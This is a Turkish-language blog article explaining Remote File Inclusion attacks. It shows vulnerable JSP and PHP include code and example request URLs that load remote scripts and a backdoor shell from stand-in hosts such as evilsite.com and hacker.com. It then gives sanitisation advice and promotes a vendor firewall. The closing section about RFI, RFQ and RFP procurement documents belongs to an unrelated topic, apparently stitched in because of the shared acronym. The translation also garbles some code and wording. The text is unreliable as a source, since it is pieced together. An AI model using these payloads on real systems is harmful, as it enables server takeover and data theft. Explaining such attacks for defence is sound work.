RFI Açığı Nedir

RFI Açığı Nedir

Uzaktan dosya ekleme (RFI), harici komut dosyalarına dinamik olarak başvuran web uygulamalarındaki güvenlik açıklarını hedefleyen bir saldırıdır.

Failin amacı, farklı bir etki alanında bulunan uzak bir URL’den kötü amaçlı yazılım (ör. arka kapı kabukları) yüklemek için bir uygulamadaki referans işlevinden yararlanmaktır.

Başarılı bir RFI saldırısının sonuçları arasında bilgi hırsızlığı, güvenliği ihlal edilmiş sunucular ve içerik değişikliğine izin veren bir site ele geçirme yer alır.

RFI ve LFI arasındaki Farklar Nelerdir?

RFI’ye benzer şekilde, yerel dosya ekleme (LFI), kötü amaçlı dosyaların web tarayıcıları aracılığıyla sunuculara yüklenmesini içeren bir vektördür. Dosya dahil etme saldırıları bağlamında genellikle iki vektöre birlikte başvurulur.

Her iki durumda da başarılı bir saldırı, kötü amaçlı yazılımın hedeflenen sunucuya yüklenmesiyle sonuçlanır. Ancak, RFI’den farklı olarak, LFI saldırıları, kullanıcı tarafından sağlanan/kontrol edilen girdiyi doğrulamakta başarısız olan güvenli olmayan yerel dosya yükleme işlevlerinden yararlanmayı amaçlar.

RFI Açığı Nedir
RFI Açığı Nedir

Sonuç olarak, kötü niyetli karakter yüklemelerine ve dizin/yol geçiş saldırılarına izin verilir. Failler daha sonra kötü amaçlı yazılımı uzak bir konumdan sertleştirilmiş bir harici referans işlevi kullanarak almak yerine, güvenliği ihlal edilmiş bir sisteme doğrudan yükleyebilir.

Uzaktan Dosya Ekleme Örnekleri

RFI penetrasyonlarının nasıl çalıştığını göstermek için şu örnekleri göz önünde bulundurun:

  1. Bir JSP sayfası şu kod satırını içerir: <jsp:include page=”<%=(String)request.getParmeter(“ParamName”)%>”> aşağıdaki istekle değiştirilebilir: Page1.jsp?ParamName= /WEB-INF/DB/parola.

Talebin işlenmesi, şifre dosyasının içeriğini faile ifşa eder.

  • Bir web uygulamasının, burada gösterildiği gibi bir URL adresinden içerik talep eden bir içe aktarma ifadesi vardır: <c:import url=”<=request.getParameter(“conf”)%>”>.

Temizlenmemişse, aynı ifade kötü amaçlı yazılım enjeksiyonu için kullanılabilir.

Örneğin: Page2.jsp?conf=https://evilsite.com/attack.js.

  • RFI saldırıları, genellikle, uzak bir kötü amaçlı dosyaya başvurmak için istek parametrelerinin değiştirilmesiyle başlatılır.

Örneğin, aşağıdaki kodu göz önünde bulundurun:

$incfile = $_REQUEST[“file”]; include($incfile.”.php”);

Burada, ilk satır HTTP isteğinden dosya parametre değerini çıkarırken, ikinci satır dosya adını dinamik olarak ayarlamak için bu değeri kullanır. Dosya parametre değerinin uygun şekilde dezenfekte edilmediği durumlarda, bu kod yetkisiz dosya yüklemeleri için kullanılabilir.

RFI Açığı Nedir

Örneğin, bu URL dizesi;

http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor uzak bir konumda depolanan bir arka kapı dosyasına harici bir referans içerir.

(http://www.hacker.com/backdoor_shell.php.)

Uygulamaya yüklendikten sonra, bu arka kapı daha sonra temel sunucuyu ele geçirmek veya uygulama veritabanına erişim sağlamak için kullanılabilir.

R57 arka kapı kabuğu, RFI bölümleri için popüler bir seçimdir.

DIY RFI Önleme ve Azaltma

Bir dereceye kadar, uygun giriş doğrulama ve temizleme yoluyla RFI saldırıları riskini en aza indirebilirsiniz. Ancak, bunu yaptığınızda, tüm kullanıcı girdilerinin tamamen sterilize edilebileceği yanılgısından kaçınmak önemlidir. Sonuç olarak, sterilizasyon yalnızca özel bir güvenlik çözümünün tamamlayıcısı olarak düşünülmelidir.

Bunu söyledikten sonra, kullanıcı tarafından sağlanan/kontrol edilen girdileri elinizden gelen en iyi şekilde sterilize etmek her zaman tercih edilir.

RFI Açığı Nedir

Bu girdiler şunları içerir:

Temizleme sürecinde, giriş alanları bir kara liste (izin verilmeyen kötü niyetli karakterler) yerine bir beyaz listeye (izin verilen karakter kümesi) göre kontrol edilmelidir. Saldırganlar, kodlanmış veya onaltılık biçimler gibi farklı bir biçimde girdi sağlamayı seçebildiğinden, genel olarak kara liste doğrulaması zayıf bir çözüm olarak kabul edilir.

Ayrıca, sunucu tarafında uygulanacak çıktı doğrulama mekanizmaları için en iyi uygulamadır. İşlem yükünü azaltma avantajına sahip olan istemci tarafı doğrulama işlevleri, proxy araçları tarafından yapılan saldırılara karşı da savunmasızdır.

Son olarak, yükleme dizinleri için yürütme iznini kısıtlamayı ve izin verilen dosya türlerinin (örneğin PDF, DOC, JPG, vb.) beyaz listesini tutmayı ve aynı zamanda yüklenen dosya boyutlarını kısıtlamayı düşünmelisiniz.

Özel RFI Koruması

Belirtildiği gibi, girdi temizleme ve uygun dosya yönetimi uygulamaları, RFI riskini etkin bir şekilde en aza indirseler bile tek başına neredeyse hiçbir zaman yeterli değildir. Bu önemlidir, çünkü birçok saldırı, DIY uygulamaları tarafından teşvik edilen yanlış bir güvenlik duygusu sonucunda başarılı olur.

RFI saldırılarıyla mücadele etmek için bir dizi çözüm vardır. Bunlardan ilki, kullanıcı girdilerini izleyen ve imza, davranışsal ve itibara dayalı güvenlik buluşsal yöntemlerinin bir kombinasyonunu kullanarak kötü niyetli istekleri filtreleyen Web Uygulaması Güvenlik Duvarımızdır (WAF). WAF, güvenli bir proxy olarak dağıtılır ve bu nedenle, web uygulamanızla etkileşime girmeden önce sunucunun ucundaki RFI girişimlerini engeller.

Ek olarak, hizmetlerimizi etkinleştirmeden önce uygulamanızın güvenliğinin ihlal edilmesi durumunda, arka kapı koruması bulunmaktadır; bu, sunucunuzda zaten yüklü olan arka kapıları algılayan ve karantinaya alan reaktif bir önlemdir.

Son olarak, kitle kaynaklı teknolojimiz, RFI saldırıları sırasında enjekte edilen kötü amaçlı yazılımlar için merkezi dağıtım noktaları olarak hizmet veren, güvenliği ihlal edilmiş etki alanlarından oluşan sürekli güncellenen bir veritabanını korumamıza olanak tanır.

Bu etki alanlarını izlemek, filtreleme sürecimize ek doğruluk sağlarken, sıfırıncı gün RFI saldırıları da dahil olmak üzere ortaya çıkan RFI saldırı vektörlerine karşı hızlı yanıt verilmesini sağlar.

RFI’ler, RFQ’lar ve RFP’ler Nasıl İlişkilidir?

RFI’ler, RFQ’lar ve RFP’ler genellikle birbirleriyle kombinasyon halinde veya bağımsız olarak kullanılır. Bazen pazarınızı daha iyi anlamak için bir bilgi talebiyle başlamanız gerekebilir ve ardından bu bilgiyle bir RFQ veya RFP yayınlamaya geçebilirsiniz. Her biri farklı bir araçtır, peki siz hangisini kullanıyorsunuz?

Goldspring Consulting’in kıdemli danışmanı Kevin Iwamoto’ya göre, “Üçü de potansiyel tedarikçilerden ilgili bilgileri elde etmek için on yıllardır küresel olarak kullanılmaktadır ve tüm satıcıların, yerleşik ve potansiyelin sahip olduğu adil ve eşit ağırlıklı bir süreç oluşturmak ve oluşturmak içindir. bir şirket için ‘tercih edilen’ bir tedarikçi olma şansı. Kurumsal risk azaltma, süreç standardizasyonu, maliyet tasarrufu ve maliyetten kaçınma konularında etkili oldular.”

Her bir RFx belgesi türünün temel amacı, mükemmel satıcının seçilmesine yardımcı olmaktır. Mükemmel satıcıyı seçmek için, bunu yapmak için kritik sorularınızın yanıtlarına ihtiyacınız var, ancak doğru soruları sorduğunuzdan nasıl emin oluyorsunuz? Genellikle bir RFI, RFQ veya RFP yayınlamanız gerekip gerekmediğine gelir.

Ekim 17, 2021

SQL Injection Nedir?

Haziran 23, 2021

CSRF Nedir

YORUMLAR

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir